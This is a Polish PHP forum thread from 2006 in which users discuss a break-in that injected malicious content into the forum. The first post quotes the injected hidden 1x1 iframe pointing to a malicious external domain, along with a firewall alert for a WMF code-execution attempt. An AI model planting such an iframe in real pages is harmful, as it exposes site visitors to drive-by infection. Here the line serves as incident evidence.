Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Włam na forum!?, Wczoraj... 22.00 :| ??????
Master Miko
post
Post #1





Grupa: Zarejestrowani
Postów: 530
Pomógł: 0
Dołączył: 15.01.2005
Skąd: Warszawa

Ostrzeżenie: (0%)
-----

Co się wczoraj stało! Wchodzę na forum... (przez IE) patrzę, nagle pojawia się monit skryptu... i jakiś dziwny kod. Zacina się... firewall wybucha świszczy i promieniuje głęboką czerwienią...
wypluwając:

Kod
IP: 85.249.19.122
PORT: TCP
[362] MS WMF Code Exec Attempt Detected (CVE-2005-4560)


Wlazłem FIrefoxem... nic się nie pojawiło poza... Nie można połączyć się z domeną "http://2-extreme.biz/traff.php?adv=53" (BROŃ BOŻE NIE WCHODZIĆ TAM)

Zaintrygował mnie mały kwadracik na górze forum... był to iframe o treści:

[HTML] pobierz, plaintext 
  1. <iframe src="http://2-extreme.biz/traff.php?adv=53" width=1 height=1></iframe>
[HTML] pobierz, plaintext


Umieszczony dokładnie nad doctype.

Jak on się tam dostał?! Jak to się stało?! Jakim sposbem :|

Mam farta.. (i firewalla), bo naszczęście miałem dobre zabezpieczenia.. ale tak to mój komp byłby teraz... zainfekowany... to było dosyć niebezpieczne :/

(IMG:http://forum.php.pl/style_emoticons/default/ohmy.gif)
Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi
hwao
post
Post #2


Developer


Grupa: Moderatorzy
Postów: 2 844
Pomógł: 20
Dołączył: 25.11.2003
Skąd: Olkusz
Cytat(Seth @ 2006-05-07 19:58:41)
GrayHat: 012345abcdefABCDEF - zgadlem ? :PPPP

Kto jak kto, ale jak na GrayHat to wielce prawdopodobne...
Ewentualnie obstawiam ze to hash md5 i pierwsze 6 znakow z duzej litery.

Co do biosow, to sa uniwersalne hasla.
Moral z tego taki, nie uzywac dziurawych systemow operacyjnych (IMG:http://forum.php.pl/style_emoticons/default/biggrin.gif)
Np mi sie nic nie stalo (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif)
Go to the top of the page
+Quote Post

Posty w temacie
- Master Miko   Włam na forum!?   6.05.2006, 19:30:29
- - seaquest   Wiemy, już zlikwidowaliśmy i zabezpieczyliśmy.   6.05.2006, 19:50:31
- - Master Miko   Cieszę się bardzo, że ekipa forum php jest bardzo ...   6.05.2006, 19:52:20
- - nospor   Doskonale Cię rozumiem Master Miko. Postaramy się ...   6.05.2006, 20:43:25
- - kosheen2k   dokładnie miałem to samo, ale niestety mój Kerio P...   6.05.2006, 22:50:58
- - Zajec   Dzwię się, że po takich akcjach ludzie jeszcze wra...   7.05.2006, 10:12:02
- - Master Miko   Ten wirus został zaprojektowany specjalnie na inte...   7.05.2006, 12:16:24
- - sf   Cytat(Master Miko @ 2006-05-07 12:16:24)a dla...   7.05.2006, 13:07:03
- - GrayHat   heh php.pl chcialo zarobic co?? takie serwisy plac...   7.05.2006, 14:39:24
- - DeyV   Ooby które ucierpiały z powodu naszych problemów s...   7.05.2006, 14:56:03
- - NuLL   Ja nie mam nic Ba - mam nawet zablokowany dostep ...   7.05.2006, 15:01:00
- - Slump   NuLL moze i glupia propozycja a resetowales biosa?...   7.05.2006, 15:15:35
- - NuLL   Mam laptopa - nie wiem nawet jak to sie robi - bed...   7.05.2006, 15:20:10
- - strife   Cytat(NuLL @ 2006-05-07 16:20:10)Mam laptopa ...   7.05.2006, 15:32:46
- - NuLL   Thx za troske Osobiscie myslalem ze format bedzi...   7.05.2006, 15:59:46
- - Fo   Cytat("mail przeprosinowy")W związku z o...   7.05.2006, 16:57:43
- - Radarek   A mnie osobiscie dziwi to 'słabe hasło jednego...   7.05.2006, 17:23:15
- - aleksander   przyznac sie ktory to:D bedzie publiczne biczowani...   7.05.2006, 17:34:58
- - strife   Cytat(Radarek @ 2006-05-07 18:23:15)A mnie os...   7.05.2006, 17:39:44
- - GrayHat   bierzcie przyklad ze mnie 18 znakow: 6 cyfr, 6 li...   7.05.2006, 18:49:04
- - Zajec   Cytat(Master Miko @ 2006-05-07 12:16:24)Równi...   7.05.2006, 18:51:03
- - seaquest   Fo: ban na całą klasę adresów, to jeszcze dodatkow...   7.05.2006, 19:36:40
- - Seth   GrayHat: 012345abcdefABCDEF - zgadlem ? :PPPP   7.05.2006, 19:58:41
- - hwao   Cytat(Seth @ 2006-05-07 19:58:41)GrayHat: 012...   7.05.2006, 20:29:51
- - mario   przeczytalem przed chwileczka mail'a nt. wlamu...   7.05.2006, 20:30:52
- - spenalzo   Prosze o info jak ten syf usunąć z IPB - u mnie na...   7.05.2006, 20:47:17
- - angel2953   Cytat(spenalzo @ 2006-05-07 20:47:17)Prosze o...   7.05.2006, 21:05:00
- - DeyV   Spenalzo - czy wiecie, w jaki sposob ktoś zdobył h...   7.05.2006, 21:11:43
- - spenalzo   Mówie o dokładnie tym samym Co ciekawe - zauważył...   7.05.2006, 21:28:53
- - Master Miko   Cytat(Zajec @ 2006-05-07 17:51:03)Cytat(Maste...   7.05.2006, 21:39:15
- - DeyV   spenalzo - jesli używasz ipb 1.3 to problem może b...   7.05.2006, 22:23:29
- - Zajec   Cytat(Master Miko @ 2006-05-07 21:39:15)ahaha...   7.05.2006, 22:26:58
- - spenalzo   No ja spodziewam sie akurat, że to nie jest złaman...   7.05.2006, 23:12:45
- - hwao   Pewne ktos znalaz dziure na ipb i "sprzeda...   8.05.2006, 05:53:35
- - angel2953   Cytat(spenalzo @ 2006-05-07 23:12:45)No ja sp...   8.05.2006, 10:34:44
- - MrMag   wiem, ze to samobojstwo, ale jezeli macie dostep d...   8.05.2006, 10:56:45
- - sztosz   Przepraszam że się wtrącę, ale to całe przpraszani...   8.05.2006, 11:31:07
- - angel2953   Cytat(MrMag @ 2006-05-08 10:56:45)wiem, ze to...   8.05.2006, 13:39:15
- - normanos   IPB 1.3 to prehistoria. sporo dziur. od tej wersji...   8.05.2006, 14:00:28
- - Slump   Licecja jest od dawna, prace nad uruchomieniem for...   8.05.2006, 14:27:58
- - angel2953   Cytat(Slump @ 2006-05-08 14:27:58)Licecja jes...   8.05.2006, 14:40:39
- - DeyV   IPB 2.1 Co do własnego - wystarczy że wielu z na...   8.05.2006, 14:42:31
- - kwiateusz   no wreszcie bo 1.3 troche archaiczny system D: SLu...   8.05.2006, 18:22:03
- - seaquest   Ale to nie on, tylko ja, NuLL i jeszcze pare innyc...   8.05.2006, 19:24:18
- - spenalzo   Dzisiaj poprzeglądałem troche statsy z webalizera ...   8.05.2006, 21:05:14
- - kwiateusz   nie wiem czy do 1.3 jest taki modzik ale do 2.1 je...   8.05.2006, 22:19:48
- - acztery   forum na którym tyle o bezpieczenstwie a tu włam,...   8.05.2006, 23:35:14
- - GrayHat   Cytat(sztosz @ 2006-05-08 12:31:07)Przeprasza...   9.05.2006, 00:20:36
- - hwao   GrayHat czemu nie czytasz wszytkich tematow i sie ...   9.05.2006, 06:11:31
- - sztosz   @GrayHat: Ale co to że kompy zostały zainfekowane ...   9.05.2006, 11:46:20
- - hOMER   witam bardzo prosze o pomoc. jak sobie poradzilisc...   9.05.2006, 14:45:32
- - seaquest   Trzeba mieć dostęp do panelu administratora forum,...   9.05.2006, 14:48:27
- - nospor   CytatTrzeba mieć dostęp do panelu administratora f...   9.05.2006, 14:54:07
- - hOMER   Cytat(seaquest @ 2006-05-09 13:48:27)Jako zab...   9.05.2006, 15:51:09
- - seaquest   Trzeba ręcznie dopisać.   9.05.2006, 16:39:34
- - hOMER   jakaś wskazóweczka gdzie i co?   9.05.2006, 17:47:45
- - kwiateusz   trzeba wlasnego moda splodzic ktory bedzie dziala ...   9.05.2006, 18:23:36
- - LBO   Właśnie dostałem owego maila z linkiem do zainfeko...   13.05.2006, 04:51:38
- - GrayHat   tez wlasnie dostalem maila z tym linkiem   13.05.2006, 05:52:30
- - onekamel   Witam powrocmy do tematu maila z przeprosinami i m...   15.05.2006, 17:03:24
- - seaquest   Powinna, ale część maili podochodziła później. Dla...   15.05.2006, 17:12:48

« Następny starszy · Forum · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 13.10.2025 - 17:58
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn